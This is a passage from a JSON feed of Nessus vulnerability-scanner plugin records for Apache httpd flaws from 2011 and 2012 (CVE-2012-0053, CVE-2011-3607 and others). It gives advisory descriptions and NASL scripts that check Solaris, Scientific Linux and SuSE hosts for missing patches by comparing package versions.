Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script. 
(CVE-2012-0053)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : apache (cve_2011_3607_buffer_overflow)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:apache"], "id": "SOLARIS11_APACHE_20120420.NASL", "href": "https://www.tenable.com/plugins/nessus/80582", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80582);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : apache (cve_2011_3607_buffer_overflow)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - Integer overflow in the ap_pregsub function in\n server/util.c in the Apache HTTP Server 2.0.x through\n 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif\n module is enabled, allows local users to gain privileges\n via a .htaccess file with a crafted SetEnvIf directive,\n in conjunction with a crafted HTTP request header,\n leading to a heap-based buffer overflow. 
(CVE-2011-3607)\n\n - The mod_proxy module in the Apache HTTP Server 2.0.x\n through 2.0.64, and 2.2.x through 2.2.21, when the\n Revision 1179239 patch is in place, does not properly\n interact with use of (1) RewriteRule and (2)\n ProxyPassMatch pattern matches for configuration of a\n reverse proxy, which allows remote attackers to send\n requests to intranet servers via a malformed URI\n containing an @ (at sign) character and a : (colon)\n character in invalid positions. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2011-3368.\n (CVE-2011-4317)\n\n - scoreboard.c in the Apache HTTP Server 2.2.21 and\n earlier might allow local users to cause a denial of\n service (daemon crash during shutdown) or possibly have\n unspecified other impact by modifying a certain type\n field within a scoreboard shared memory segment, leading\n to an invalid call to the free function. (CVE-2012-0031)\n\n - protocol.c in the Apache HTTP Server 2.2.x through\n 2.2.21 does not properly restrict header information\n during construction of Bad Request (aka 400) error\n documents, which allows remote attackers to obtain the\n values of HTTPOnly cookies via vectors involving a (1)\n long or (2) malformed header in conjunction with crafted\n web script. 
(CVE-2012-0053)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2011-3607-buffer-overflow-vulnerability-in-apache-http-server\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?40ebbd75\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2011-4317-improper-input-validation-vulnerability-in-apache-http-server\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed03d708\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-0031-resource-management-errors-vulnerability-in-apache-http-server\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cc400cae\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-0053-information-disclosure-vulnerability-in-apache-http-server\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90df36e7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 6.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:apache\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", 
\"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^apache-2\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.6.0.6.0\", sru:\"SRU 6.6\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : apache\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_warning(port:0, extra:error_extra);\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"apache\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T14:51:07", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via a previous update) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. 
Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL5.x i386/x86_64 (20120221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd", "p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-devel", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120221_HTTPD_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61261", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific 
Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61261);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL5.x i386/x86_64 (20120221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. 
A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1203&L=scientific-linux-errata&T=0&P=874\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?99d5fd4b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"httpd-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-debuginfo-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-devel-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"httpd-manual-2.2.3-63.sl5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"mod_ssl-2.2.3-63.sl5.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-23T14:50:02", "description": "This update fixes the following issues :\n\n - Denial of Service via special requests in mod_proxy_ajp.\n (CVE-2012-4557)\n\n - improper LD_LIBRARY_PATH handling. (CVE-2012-0883)\n\n - filename escaping problem Additionally, some non-security bugs have been fixed:. (CVE-2012-2687)\n\n - ignore case when checking against SNI server names.\n [bnc#798733]\n\n - httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff reworked to reflect the upstream changes. This will prevent the 'Invalid URI in request OPTIONS *' messages in the error log. 
[bnc#722545]\n\n - new sysconfig variable APACHE_DISABLE_SSL_COMPRESSION;\n if set to on, OPENSSL_NO_DEFAULT_ZLIB will be inherited to the apache process; openssl will then transparently disable compression. This change affects start script and sysconfig fillup template. Default is on, SSL compression disabled. Please see mod_deflate for compressed transfer at http layer. [bnc#782956]", "cvss3": {"score": null, "vector": null}, "published": "2013-03-05T00:00:00", "type": "nessus", "title": "SuSE 11.2 Security Update : Apache (SAT Patch Number 7409)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0883", "CVE-2012-2687", "CVE-2012-4557"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:apache2", "p-cpe:/a:novell:suse_linux:11:apache2-doc", "p-cpe:/a:novell:suse_linux:11:apache2-example-pages", "p-cpe:/a:novell:suse_linux:11:apache2-prefork", "p-cpe:/a:novell:suse_linux:11:apache2-utils", "p-cpe:/a:novell:suse_linux:11:apache2-worker", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_APACHE2-130225.NASL", "href": "https://www.tenable.com/plugins/nessus/65023", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65023);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0883\", \"CVE-2012-2687\", \"CVE-2012-4557\");\n\n script_name(english:\"SuSE 11.2 Security Update : Apache (SAT Patch Number 7409)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following issues :\n\n - Denial of Service via special requests in mod_proxy_ajp.\n (CVE-2012-4557)\n\n - improper LD_LIBRARY_PATH handling. (CVE-2012-0883)\n\n - filename escaping problem Additionally, some\n non-security bugs have been fixed:. (CVE-2012-2687)\n\n - ignore case when checking against SNI server names.\n [bnc#798733]\n\n - httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff\n reworked to reflect the upstream changes. This will\n prevent the 'Invalid URI in request OPTIONS *' messages\n in the error log. [bnc#722545]\n\n - new sysconfig variable APACHE_DISABLE_SSL_COMPRESSION;\n if set to on, OPENSSL_NO_DEFAULT_ZLIB will be inherited\n to the apache process; openssl will then transparently\n disable compression. This change affects start script\n and sysconfig fillup template. Default is on, SSL\n compression disabled. Please see mod_deflate for\n compressed transfer at http layer. 
[bnc#782956]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=774045\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=777260\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=782956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=788121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=793004\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=798733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3368.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4317.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0021.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0883.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2687.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-4557.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7409.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:11:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:2, 
reference:\"apache2-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-doc-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-example-pages-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-prefork-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-utils-2.2.12-1.36.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"apache2-worker-2.2.12-1.36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:48:15", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released in a previous update) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. 
(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : httpd on SL6.x i386/x86_64 (20120213)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:httpd", "p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo", "p-cpe:/a:fermilab:scientific_linux:httpd-devel", "p-cpe:/a:fermilab:scientific_linux:httpd-manual", "p-cpe:/a:fermilab:scientific_linux:httpd-tools", "p-cpe:/a:fermilab:scientific_linux:mod_ssl", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120213_HTTPD_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61245", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61245);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"Scientific Linux Security Update : httpd on SL6.x i386/x86_64 (20120213)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n 
attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released in a\nprevious update) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2220\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ddbd264\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and 
